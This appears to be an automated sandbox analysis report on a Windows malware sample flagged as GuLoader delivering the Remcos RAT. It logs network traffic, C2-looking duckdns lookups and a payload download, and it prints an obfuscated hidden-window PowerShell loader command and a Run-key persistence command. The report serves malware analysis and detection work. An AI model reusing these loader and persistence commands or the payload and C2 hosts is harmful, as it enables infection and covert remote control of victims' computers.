                                Oct 6, 2024 11:47:05.208239079 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.208784103 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.208802938 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.208939075 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209076881 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209084988 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.209103107 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.209117889 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209135056 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.209275007 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209275007 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209424973 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.209444046 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.209613085 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210342884 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.210364103 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.210516930 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210516930 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210545063 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210561991 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.210654974 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.210728884 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.210740089 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210843086 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210908890 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210908890 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.210938931 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.211169958 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:10.254287958 CEST497693980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:10.533413887 CEST398049769192.169.69.26192.168.11.20
                                Oct 6, 2024 11:47:10.533767939 CEST497693980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:10.534594059 CEST497693980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:10.745951891 CEST398049769192.169.69.26192.168.11.20
                                Oct 6, 2024 11:47:10.858428001 CEST497703981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:11.871938944 CEST497703981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:13.887119055 CEST497703981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:17.901822090 CEST497703981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:25.915685892 CEST497703981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:33.058794975 CEST497733980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:33.264039993 CEST398049773192.169.69.26192.168.11.20
                                Oct 6, 2024 11:47:33.264236927 CEST497733980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:33.265039921 CEST497733980192.168.11.20192.169.69.26
                                Oct 6, 2024 11:47:33.471057892 CEST398049773192.169.69.26192.168.11.20
                                Oct 6, 2024 11:47:33.472913980 CEST497743981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:34.476418972 CEST497743981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:36.491615057 CEST497743981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:40.506438017 CEST497743981192.168.11.2045.74.58.7
                                Oct 6, 2024 11:47:48.520194054 CEST497743981192.168.11.2045.74.58.7
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 6, 2024 11:47:02.905457973 CEST5727753192.168.11.201.1.1.1
                                Oct 6, 2024 11:47:03.312587023 CEST53572771.1.1.1192.168.11.20
                                Oct 6, 2024 11:47:10.142237902 CEST5989353192.168.11.201.1.1.1
                                Oct 6, 2024 11:47:10.252559900 CEST53598931.1.1.1192.168.11.20
                                Oct 6, 2024 11:47:10.747122049 CEST5498053192.168.11.201.1.1.1
                                Oct 6, 2024 11:47:10.856147051 CEST53549801.1.1.1192.168.11.20
                                Oct 6, 2024 11:47:31.934254885 CEST5561053192.168.11.201.1.1.1
                                Oct 6, 2024 11:47:32.045561075 CEST53556101.1.1.1192.168.11.20
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 6, 2024 11:47:02.905457973 CEST192.168.11.201.1.1.10xe710Standard query (0)simonastolerciuc.roA (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:10.142237902 CEST192.168.11.201.1.1.10xcfa1Standard query (0)janbours92harbu03.duckdns.orgA (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:10.747122049 CEST192.168.11.201.1.1.10x76dcStandard query (0)janbours92harbu04.duckdns.orgA (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:31.934254885 CEST192.168.11.201.1.1.10x3008Standard query (0)janbours92harbu007.duckdns.orgA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 6, 2024 11:47:03.312587023 CEST1.1.1.1192.168.11.200xe710No error (0)simonastolerciuc.ro85.120.16.93A (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:10.252559900 CEST1.1.1.1192.168.11.200xcfa1No error (0)janbours92harbu03.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:10.856147051 CEST1.1.1.1192.168.11.200x76dcNo error (0)janbours92harbu04.duckdns.org45.74.58.7A (IP address)IN (0x0001)false
                                Oct 6, 2024 11:47:32.045561075 CEST1.1.1.1192.168.11.200x3008Name error (3)janbours92harbu007.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                • simonastolerciuc.ro
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.11.204976885.120.16.934431264C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                2024-10-06 09:47:03 UTC189OUTGET /images/vnlXriHFWaBU97.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: simonastolerciuc.ro
                                Cache-Control: no-cache
                                2024-10-06 09:47:04 UTC499INHTTP/1.1 200 OK
                                Connection: close
                                content-type: application/octet-stream
                                last-modified: Mon, 30 Sep 2024 01:47:33 GMT
                                accept-ranges: bytes
                                content-length: 494656
                                date: Sun, 06 Oct 2024 09:47:03 GMT
                                server: LiteSpeed
                                vary: User-Agent
                                referrer-policy: no-referrer-when-downgrade
                                access-control-allow-origin: *
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-10-06 09:47:04 UTC869INData Raw: 1b f0 98 8a a9 39 84 a2 13 c7 e4 90 6a af 05 04 86 9e 38 0a 69 86 9a cc 4d b2 2c c3 cf 8c 2e 3c c4 d1 85 ef 2a ec 9b 11 53 e6 81 f2 10 2a a4 36 8a 80 06 bd d7 04 c6 81 8e 0a ca 9b 8c bc be cc f6 3b 02 9f 74 f3 2b 86 da ff 13 be be 6a 27 a1 fc 70 37 2b 3c 5b b0 92 48 08 e1 a9 8e d2 f0 73 84 6e 43 6d 92 9a a2 a9 71 96 95 ed c1 c0 7c 17 59 54 2a 99 52 fc e9 89 dd 60 95 fa 86 21 eb c7 0c cd 25 5f 13 ee 4b b0 9a cc 5c dc a1 7d bd aa 6e 3b 00 17 24 8c 02 99 48 35 22 89 8d a2 a2 15 22 78 0f 82 ba f7 59 91 51 80 e1 9e 86 1e a6 d8 be 06 76 0d 45 96 57 a1 1e 11 c5 dc bb 9a 9f 52 38 cb 73 21 81 7d 8b cd c9 f7 fb 53 b1 6b cc 4b 36 0d 2c 6b d5 eb 5f 25 2d 7f ba 9d 99 e9 28 7e b5 7f e0 7a a3 1b 72 e0 37 26 3b 0b fd 93 f5 b9 b0 65 0e 6e 43 e5 d1 1f ec d9 d3 78 00 55 38
                                Data Ascii: 9j8iM,.<*S*6;t+j'p7+<[HsnCmq|YT*R`!%_K\}n;$H5""xYQvEWR8s!}SkK6,k_%-(~zr7&;enCxU8
                                2024-10-06 09:47:04 UTC14994INData Raw: 49 e5 d4 6a 60 62 5e ad 02 85 76 9a 4f f3 1d 4c 90 f6 16 88 3b 82 7c f7 00 fb 78 fe 45 58 68 31 0a 86 43 79 3e 22 7c 53 fa 85 58 02 78 58 45 8f 5f c8 c2 ab 10 eb 47 d5 30 4a 18 92 35 a8 ee f8 8b e9 38 93 3c 32 ad f5 00 c2 9f f0 79 23 da 0e 42 a0 8b ff ea 23 e6 2d 93 e7 ba a2 b1 85 f0 72 ef fc 36 51 8b 0b 50 2f b6 40 f1 0e 4d b2 8f 73 99 ce c0 be d1 9d f3 10 82 66 f6 4c c5 bd 35 94 9b dc fa 53 f1 b9 02 48 99 49 79 20 83 cc 7a 67 89 12 c7 30 ba 6d 72 db bf 25 f9 e5 cd c2 0c 8f 52 8a 0b 38 e4 a9 a7 9b 9d 02 b6 93 3b 13 aa 96 4a 0e ab f3 22 22 0f ea eb 49 6c 3e f7 4c c0 5c 46 ba 93 22 fd d9 8e 3e 27 67 69 55 48 ec f1 12 0c 11 97 5f 6b 4b c8 cb c4 2b 3b f8 30 3a a0 b3 28 0f 16 d7 b2 44 df 7a 41 65 64 86 d6 c2 86 75 af 13 6e 7c 2b b3 65 20 04 6a 84 31 a6 6b aa
                                Data Ascii: Ij`b^vOL;|xEXh1Cy>"|SXxXE_G0J58<2y#B#-r6QP/@MsfL5SHIy zg0mr%R8;J""Il>L\F">'giUH_kK+;0:(DzAedun|+e j1k
                                2024-10-06 09:47:04 UTC16384INData Raw: d3 d2 37 8f 05 e4 3c e6 1c f1 7a 5c ce db 69 4f 39 ed 2b 25 9b 19 58 14 48 64 7c 42 7d 2e a5 0b 54 e1 a0 61 e8 ba 9f c7 6b ad 4e af 03 65 ab ff bd 80 bb b0 75 10 af 47 ef 6a ed 7b 76 3a 56 53 e5 fe a7 62 c9 be bd f8 cd 4a 53 02 48 da 0e 30 d1 0f 89 b6 4e 45 86 8a 1f 51 16 c8 f9 0b e7 9d 11 07 bc fb c2 d7 70 a7 ab 84 b1 9d 6d 52 ac ed f9 9e df 6e 51 7d 4e 4b 51 f0 f6 b5 13 c6 c1 a1 1e 55 96 1a 81 cd 73 7f ad cd 23 fe 0e 7a 42 5c 4d e8 18 5d 85 eb 7e 50 8e 0a 1e da ea 98 32 78 b8 12 23 b2 85 3d 5f c6 65 b0 07 c3 8c fc 22 2f df ff 08 51 bb ed 70 2d 93 23 d9 9d 65 87 78 cc 21 ac 6e cc 11 2f 1d ba e0 6b a0 97 7a ee fd ed 52 16 25 76 f6 08 6c 24 9a 86 13 76 f4 dc 28 34 b9 ba b4 03 34 33 03 40 9b b2 b7 4e 71 08 05 7f 33 ca ad 9e bf 03 07 be 18 59 b0 e2 90 94 f0
                                Data Ascii: 7<z\iO9+%XHd|B}.TakNeuGj{v:VSbJSH0NEQpmRnQ}NKQUs#zB\M]~P2x#=_e"/Qp-#ex!n/kzR%vl$v(443@Nq3Y
                                2024-10-06 09:47:04 UTC16384INData Raw: c7 f2 23 ff 4f 26 55 66 26 d3 10 fe cc 2b 5e 54 69 b3 55 a8 e5 56 16 95 05 72 f1 23 dd 1c ac 8b 58 e9 72 6d ba ab 9e 3f 8d 1e b8 61 f1 9c 38 ca 92 68 8a ce 1e 6c 9f 5a 7b 64 c4 7d 5f 0e 22 ea 4f 0e 8e 25 04 9f 8f 1a bd 1e 3a 39 6a 01 6a dd 92 0a 22 7a 1e a3 a3 90 75 5c 89 37 82 d7 31 27 8b 73 24 33 1a 20 1a b1 30 b6 39 23 2a 97 00 ff 3c c2 6a 46 76 d3 62 9d 79 02 31 bc 71 c8 18 ab a9 91 59 69 a0 39 8d 2f a8 8a 01 32 7a f7 92 26 13 46 39 a5 0c 9f 84 fa 0c 8e 68 94 26 e1 d9 7e 65 78 11 46 5e ba e0 65 01 87 19 81 01 0a f2 dd 68 be 1a 45 07 24 8d e7 34 4f 1c 3d 79 fb 74 ca ea b3 8a 29 2b 6a 60 a7 7a 57 d8 8b 51 d6 ea dc fa d6 c5 c3 b6 4d 7d dc dd f5 2c 6b 0b c7 9b 8f 0a f8 08 60 51 ca f8 fa 72 bc ee 0f 94 53 62 28 01 bb 04 b9 1f 29 80 18 24 48 28 8d 47 5c 3a
                                Data Ascii: #O&Uf&+^TiUVr#Xrm?a8hlZ{d}_"O%:9jj"zu\71's$3 09#*<jFvby1qYi9/2z&F9h&~exF^ehE$4O=yt)+j`zWQM},k`QrSb()$H(G\:
                                2024-10-06 09:47:04 UTC16384INData Raw: 9a d4 e1 f0 75 9e ae 8d 8d 60 f1 e8 43 e6 89 b8 38 fd 7d 7a 31 ad f1 85 a8 09 6e 19 98 06 57 85 bd dc 65 ab 54 fd a6 e3 98 39 16 bd 9a ed 5f 87 67 d9 49 53 7a c8 b7 58 04 39 2b c2 9a 8f 24 01 e2 3d 31 14 52 24 cf 19 c0 52 36 70 4c 9c a0 29 79 ae 2a 3f 71 76 30 c2 61 02 d1 91 0f 0d 22 5a b1 68 58 38 fe 81 e7 0c 64 a9 b1 e0 ad 39 3c 51 c5 65 70 2d 53 c7 d9 89 7c 7e a8 2f 17 1b e9 9b 06 c3 8b ce d1 b8 a4 8c f0 22 95 a5 86 9e cd a2 f2 de 93 85 b0 6e 79 9f 26 03 13 fb 47 f1 3a b0 5d 80 a1 7d 14 ba 0a 2e c1 74 16 66 24 b8 fe 66 5f 05 80 5a 27 c7 96 e2 e4 f6 1c ef 4a 3d fd 2b 20 d0 aa 42 70 84 92 14 61 99 58 6c 2d 61 39 eb b8 52 a5 d6 5a c0 1f 01 dc 6a 22 5d 69 81 02 72 90 6e 48 2d 27 60 d4 65 54 51 72 d1 bf f3 61 1f 4f a0 49 b9 03 ee 25 5c f5 19 9b d6 0a 70 c8
                                Data Ascii: u`C8}z1nWeT9_gISzX9+$=1R$R6pL)y*?qv0a"ZhX8d9<Qep-S|~/"ny&G:]}.tf$f_Z'J=+ BpaXl-a9RZj"]irnH-'`eTQraOI%\p
                                2024-10-06 09:47:04 UTC16384INData Raw: 0d 83 f3 1a b3 92 3a 39 62 25 9a 83 77 78 98 d1 3a 6f 39 bd 85 28 2c 4d 8d 66 43 9c ff d6 3f 95 f3 2e 20 02 eb de 5c ac 38 e5 b2 e8 1c e5 df 6f 89 af de 61 9f 35 63 54 d9 a4 f7 6f d3 2f 91 d3 ff 04 f9 b5 e9 34 83 fa b4 e0 ad 4d bf d3 da b5 c3 f6 48 ed 18 51 82 f3 5d e5 26 0c d7 7f f8 b6 08 cf c7 65 00 ab d9 ca 20 e0 f2 af af 5d 19 dc 23 da 2d 34 24 2c 7f ba b1 c7 de f1 07 09 3c ab 52 83 cc e4 69 34 92 1f 29 6c bb cb 72 53 0e 06 14 8f 18 b6 6a 1d 6f 75 89 30 93 3d 76 27 e9 b1 a2 bc 28 4b 02 d9 cf 93 e2 f1 e7 35 b4 16 d3 a5 bd da e2 8f 47 f1 6b eb ce d2 fe c7 de 35 0a eb cf 2b ad 1d 23 f8 dc f2 f8 22 cb 76 e0 95 d2 df c4 fb 01 65 ea 15 3f 24 23 29 08 de 0d 04 1c 5f 2a 84 1b a4 06 e4 95 e8 ad a7 8c 98 2e 48 4e 17 d2 fd a0 b9 53 12 86 38 a1 3d 46 53 e7 5c 03
                                Data Ascii: :9b%wx:o9(,MfC?. \8oa5cTo/4MHQ]&e ]#-4$,<Ri4)lrSjou0=v'(K5Gk5+#"ve?$#)_*.HNS8=FS\
                                2024-10-06 09:47:04 UTC16384INData Raw: b1 41 4a 56 b4 76 22 91 45 ea 98 29 79 b0 b7 52 fa 87 77 23 14 5e e2 46 c0 54 23 b3 bb e9 a0 39 b4 f4 68 b6 9c fc 9e 1b 50 c6 e6 01 ed 1f 8f d2 91 f0 5b 71 7d 87 ec ac 5c 28 5c d5 7a c7 ca 31 0b 6b b7 8d 85 2d 16 0e 0e 24 2f 26 ce f9 93 db 9b bf 78 77 f4 d4 ac 08 02 3e cf 78 36 8a 7a c2 1a 60 ed 41 69 8b e9 5f 0a 96 77 51 62 a6 1a e0 18 62 c7 1f 6f f1 43 f0 95 06 0e 9b 20 d0 8a bc 39 93 42 d4 b2 9b 1e 95 be 9a 2c db bb 69 e0 d9 05 18 2a de 55 ad ea 4d 35 60 95 72 b1 ba d3 be d9 4d d3 c9 f8 3e 4d 17 70 27 a8 65 33 e3 a5 01 27 7d 03 11 7f 4f 64 91 7a 8a 41 8d b3 76 8a c0 70 66 dd cf 19 35 6e 2c bf fe 18 3f 03 b4 8f c0 dc 9d 39 66 62 ff b6 06 0a d6 52 2c 3f 56 d6 8e c5 d5 cb 50 ae 4b 6a 53 f4 52 d4 bc 35 01 50 1e 3b 3c b3 cf b9 a4 42 71 24 13 1b 6e f5 02 2a
                                Data Ascii: AJVv"E)yRw#^FT#9hP[q}\(\z1k-$/&xw>x6z`Ai_wQbboC 9B,i*UM5`rM>Mp'e3'}OdzAvpf5n,?9fbR,?VPKjSR5P;<Bq$n*
                                2024-10-06 09:47:04 UTC16384INData Raw: e9 02 f9 60 65 f3 4a 3f 6b 39 d2 38 8f 59 b4 55 b2 5b ea f2 4b ce 97 78 e7 24 35 fc 35 ba f6 30 4c 8f f1 af d8 39 e5 ad b3 60 0d e6 ce cf 06 5b 86 02 e4 d2 a9 fb 74 0f e7 a7 ca de 0e 0f da 2e b2 48 d8 3f b9 d2 25 78 aa fd c4 8c 4a b2 a0 1c 24 d1 87 2a 61 c6 e9 4f 4f f4 8c 36 3b cb 8a 5c 7c d9 cf 93 3b 21 ba d1 b4 1e cb c4 46 d6 b2 d8 f6 55 51 a4 02 b9 8b 42 ab 04 78 d3 27 3c 47 80 22 72 48 25 ec 68 34 8e a5 f6 4f 43 fc bb fc ef bf 4b f2 0a a8 aa 6d b8 cc 00 36 e0 74 3f fb 17 56 d3 fc f8 d2 2e 22 f9 44 13 c5 a2 02 6a 34 34 48 1d 9f 9b fa bd f5 0a 19 88 bd 14 85 26 5a f8 71 8b eb cf 0d 18 b3 fe 7d 08 4e 25 7d 73 45 65 3e 1c 77 11 9f e6 99 98 b9 e5 d2 9e 4f 5e 3f ee 56 df cc c0 65 19 61 ef e3 33 dc 2a 66 6e 72 c9 51 de e8 73 53 b5 18 19 ad 4a ac 7b c5 4e 67
                                Data Ascii: `eJ?k98YU[Kx$550L9`[t.H?%xJ$*aOO6;\|;!FUQBx'<G"rH%h4OCKm6t?V."Dj44H&Zq}N%}sEe>wO^?Vea3*fnrQsSJ{Ng
                                2024-10-06 09:47:04 UTC16384INData Raw: 69 23 95 f5 e5 19 70 60 0d 53 1f ff c2 6b 79 77 1c 62 b9 fa 74 f7 67 7c 77 d7 5e 82 77 83 b7 3b 62 74 9d 7b 6c 63 2f 98 0a aa 02 5a d2 c4 97 e2 e2 b2 d0 58 fe db 57 ee 9b 79 e2 11 0d 5f 42 01 74 64 e6 20 cb f5 39 53 2f c4 e4 83 4c 27 22 89 f8 41 ce 51 3a 3f ad af 0b 61 4e 98 fc 0d 34 62 74 f3 72 69 f3 47 cc 7e a7 27 2c 45 30 a5 ba e4 2f 1f e9 6d a5 84 11 00 de 3b 7f c1 70 e3 56 ec e3 c2 b1 02 35 c9 60 83 80 f2 b2 3c a9 b9 05 96 f2 24 df bc f5 ac e6 7c 20 a6 b4 43 89 78 bf ff 7c 14 35 97 15 e8 0f 21 fc fe 14 f1 aa ba 0f 0b 3c 5a a7 47 49 54 99 b6 0f 76 0e 08 92 47 8c 19 b2 ab b5 8c 90 94 f0 be b0 d5 1a 78 9b e8 40 a7 17 fe 1e fa 19 3e 4c c0 d0 1f 89 8e b3 a3 5b 59 96 29 48 87 42 db 02 c4 7c c4 a5 7d 6b 08 48 27 c0 e7 9b 9e 06 1c bf 24 25 22 d2 bd b3 84 2e
                                Data Ascii: i#p`Skywbtg|w^w;bt{lc/ZXWy_Btd 9S/L'"AQ:?aN4btriG~',E0/m;pV5`<$| Cx|5!<ZGITvGx@>L[Y)HB|}kH'$%".
                                2024-10-06 09:47:04 UTC521INData Raw: 9d 0c 6f 2b bf 15 cb dd 0a 39 fe c1 81 b5 1f fe f4 61 93 02 0d 95 38 f5 ae 35 1f bb df ff 0a 9b 6b ac 62 e6 91 53 2f 2c b5 86 5a 72 f0 04 dc 6a 0a 5d b9 ab 71 d7 f5 eb db 2b ac 31 f4 dc ab 03 d8 c6 ea 74 e8 6a 24 e7 20 c0 c3 6a 6f 91 7e 4f 64 a2 ed 84 59 08 a5 10 0f 23 70 e3 06 b4 ab f3 95 a3 99 bc fb 1c 95 1a c2 4f a8 b9 5c 1c b7 60 a7 42 0b 53 92 d5 b3 c9 61 ce cd b5 21 74 b2 44 58 65 09 35 7b a2 3d 59 b4 19 08 ee 9b f4 33 de d6 5c 14 58 0e 0e 5a 9e 88 a4 c1 11 58 56 44 ad 9c 83 1a df 6e be b0 50 66 9e 1e 7f 3a df e8 73 9d f9 f0 3f 38 39 00 b6 61 8a 71 df 4d dd 6f d8 c3 88 f5 9e 68 48 ac 48 36 f8 f7 88 8d 29 86 e7 2a fe 93 ed c5 07 fd e9 94 d7 d7 c1 4e 9e 76 f2 8c aa 6f 3e 66 98 3f 6e 2c bf 56 e5 e6 20 49 5e 29 66 4c 12 01 11 b4 f0 d7 8d 65 16 2d c6 56
                                Data Ascii: o+9a85kbS/,Zrj]q+1tj$ jo~OdY#pO\`BSa!tDXe5{=Y3\XZXVDnPf:s?89aqMohHH6)*Nvo>f?n,V I^)fLe-V


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:05:46:28
                                Start date:06/10/2024
                                Path:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\zR4aIjCuRs.exe"
                                Imagebase:0x400000
                                File size:776'478 bytes
                                MD5 hash:02F086FB54D58BF17B51564B34166F5E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:05:46:29
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
                                Imagebase:0x860000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:05:46:29
                                Start date:06/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ab9d0000
                                File size:875'008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:05:46:54
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\msiexec.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                Imagebase:0x760000
                                File size:59'904 bytes
                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:05:46:54
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\msiexec.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                Imagebase:0x760000
                                File size:59'904 bytes
                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:05:46:54
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\msiexec.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                Imagebase:0x760000
                                File size:59'904 bytes
                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:05:47:01
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
                                Imagebase:0xa60000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:05:47:01
                                Start date:06/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ab9d0000
                                File size:875'008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:05:47:01
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
                                Imagebase:0x880000
                                File size:59'392 bytes
                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:05:47:13
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
                                Imagebase:0x760000
                                File size:482'640 bytes
                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:05:47:45
                                Start date:06/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068
                                Imagebase:0x760000
                                File size:482'640 bytes
                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:23.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.8%
                                  Total number of Nodes:1320
                                  Total number of Limit Nodes:32
